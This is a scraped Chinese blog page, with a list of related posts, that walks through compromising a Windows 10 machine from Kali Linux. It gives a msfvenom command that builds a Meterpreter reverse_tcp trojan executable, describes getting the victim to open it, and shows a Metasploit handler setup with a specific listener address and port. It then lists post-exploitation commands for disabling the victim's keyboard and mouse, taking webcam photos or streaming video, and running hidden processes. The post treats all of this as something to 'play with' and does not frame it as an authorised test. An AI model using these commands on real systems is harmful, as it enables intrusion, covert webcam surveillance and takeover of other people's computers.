2. 程式人生 > >kali滲透測試win10

kali滲透測試win10

阿新 發佈:2018-11-10

通過msfvenom生成木馬

msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=埠號 -f exe x>XX.exe

把木馬傳過去,點開就會往自己開放的ip和埠傳送一個tcp連結

在kali中

msfconsole

msf > use exploit/multi/handler
 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 172.16.4.3        #設定本地ip

lhost => 172.16.4.3

msf exploit(multi/handler) > set lport 44444             #設定本地埠

lport => 44444

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 172.16.4.3:44444

tcp連結以後可以使用以下功能

uictl開關鍵盤/滑鼠
uictl [enable/disable] [keyboard/mouse/all]  #開啟或禁止鍵盤/滑鼠
uictl disable mouse  #禁用滑鼠
uictl disable keyboard  #禁用鍵盤




webcam攝像頭命令
webcam_list  #檢視攝像頭
webcam_snap   #通過攝像頭拍照
webcam_stream   #通過攝像頭開啟視訊



execute執行檔案
execute #在目標機中執行檔案
execute -H -i -f cmd.exe # 建立新程序cmd.exe,-H不可見,-i互動

只列出一部分詳細參見下面連結

https://xz.aliyun.com/t/2536

 

咳咳。。。。玩玩就好

相關推薦

kali滲透測試win10

通過msfvenom生成木馬 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=埠號 -f exe x>XX.exe 把木馬傳過去,點開就會往自己開放的ip和埠傳送一個tcp連結 在kali中 msfcon

Kali 滲透測試- 全主動信息收集-發現

主動信息收集╋━━━━━━━━━━━━━━━━━━━━━╋┃主動信息收集 ┃┃無法避免留下訪問的痕跡 ┃┃使用受控的第三方電腦進行探測 ┃ ┃ 使用代理或已經被控制的主機

Kali滲透測試2-抓包/DNS工具

abd trace 數據 CP str 2-2 rec actual ali 轉載請註明出處。 TCPDUMP:命令行網絡抓包工具tcpdump -h tcpdump version 4.9.2 libpcap version 1.8.1 OpenSSL 1.1.0h

Kali滲透測試1-Netcat

crypt org programs serve https play eight ssa mes What is Netcat? Netcat is a featured networking utility which reads and writes data a

工具推薦:Dradis,Kali滲透測試報告生成器

滲透測試報告是任何安全評估活動 中的 關鍵可交付成果。滲透測試中 , 最終可交付成果是 一份報告,展示了所提供的服務, 使用的方法 , 發現的結果和建議。 許多滲透測試人員發現 報告的製作是 一個無聊的過程 , 因為它需要大量的時間和精力。在本文中 , 我們將討論

小白日記36:kali滲透測試之Web滲透-手動漏洞挖掘(二)-突破身份認證,作業系統任意命令執行漏洞

手動漏洞挖掘 ###################################################################################### 手動漏洞挖掘

小白日記10:kali滲透測試之埠掃描-UDP、TCP、殭屍掃描、隱蔽掃描

埠掃描 二三四層發現的目的只是為了準確發現所有活著主機IP,確定攻擊面,埠掃描即發現攻擊點,發現開放埠。埠對應網路服務及應用端程式,服務端程式的漏洞通過埠攻入。【所有的掃描結果,都不要完全相信】 一

小白日記30:kali滲透測試之Web滲透-掃描工具-Skipfish

WEB滲透-skipfish Skipfish是一個命令列模式,以C語言編寫的積極的Web應用程式的安全性偵察工具,沒有代理模式。 它準備了一個互動為目標的網站的站點地圖進行一個遞迴爬網和基於字典的探

小白日記11:kali滲透測試之服務掃描-banner、dmitry、nmap特徵庫、作業系統識別、SNMP

<strong>[email protected]:~# xprobe2 192.168.1.115 </strong> Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email pro

小白日記20:kali滲透測試之後滲透測試階段(一)--上傳工具

後滲透測試階段--上傳工具 為防止管理員將漏洞補上後,我們無法再通過該漏洞控制對方主機,所以需要進行後滲透測試階段 1、上傳各種工具 2、提權:為了全面控制目標系統 3、擦除攻擊痕跡:防止管理員通過

小白日記29:kali滲透測試之Web滲透-掃描工具-Vega

WEB掃描工具-Vega  純圖形化介面,Java編寫的開源web掃描器。兩種工作模式:掃描模式和代理模式【主流掃描功能】。用於爬站。處理表單,注入測試等。支援SSL:http://vega/ca.c

小白日記12:kali滲透測試之服務掃描(二)-SMB掃描

SMB掃描 Server Message Block 協議。與其他標準的TCP/IP協議不同,SMB協議是一種複雜的協議,因為隨著Windows計算機的開發,越來越多的功能被加入到協議中去了,很難區分哪些概念和功能應該屬於Windows作業系統本身,哪些概念應該屬於SMB

kali滲透測試工具:Crunch

Crunch是一種建立密碼字典工具,該字典通常用於暴力破解。使用Crunch工具生成的密碼可以傳送到終端、檔案或另一個程式。下面將介紹使用Crunch工具建立密碼字典。 crunch命令常用的選項如下所示。 •-o:用於指定輸出字典檔案的位置。 •-b:指定寫入檔案最大的位

小白日記18:kali滲透測試之緩衝區溢位例項(二)--Linux,穿越火線1.9.0

Linux系統下穿越火線-緩衝區溢位 原理:crossfire 1.9.0 版本接受入站 socket 連線時存在緩衝區溢位漏洞。 工具: 除錯工具:edb; ###python在漏洞溢位方面的滲透

kali滲透測試工具:Nmap

Nmap是一個免費開放的網路掃描和嗅探工具包,也叫網路對映器(Network Mapper)。該工具其基本功能有三個,一是探測一組主機是否線上;其次是掃描主機埠,嗅探所提供的網路服務;三是可以推斷主機所用的作業系統。通常,使用者利用Nmap來進行網路系統安全的評估,而黑客則

小白日記8:kali滲透測試之主動資訊收集(二)三層發現:ping、traceroute、scapy、nmap、fping、Hping

 三層發現 三層協議有:IP以及ICMP協議(internet管理協議).icmp的作用是用來實現intenet管理的,進行路徑的發現,網路通訊情況,或者目標主機的狀態;在三層發現中主要使用icmp協

【安全牛學習筆記】Kali Linux滲透測試方法

信息安全 kali linux security+ 1.安全問題的根源①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作③由於人都是會犯錯誤的,因此

kali linux滲透測試——信息收集

新網數碼 例子 .cn 收集 主機 工具 dns服務 發送 分析 一.公開網站 我們可以通過公開網站收集目標域的有關信息,這樣我們不必向目標網絡直接發送數據,從而避免使目標察覺我們的行動。 自行百度,不再贅述。 二.域名的註冊信息 whois數據庫記錄有該域名的DNS

Kali Linux Web滲透測試手冊(第二版) ---目錄

--------------------------------------------------------- 前言:         這本書新出的,目前只有英文版,雖說英語能看懂幾個單詞,但是真看起來英文手冊,還挺費時間

滲透測試DVWA測試環境環境搭建(win10

(文章結尾為報錯處理DVWA System error - config file not found. Copy config/config.inc.php.dist to config/config.inc.php and configure to your environment.) 1.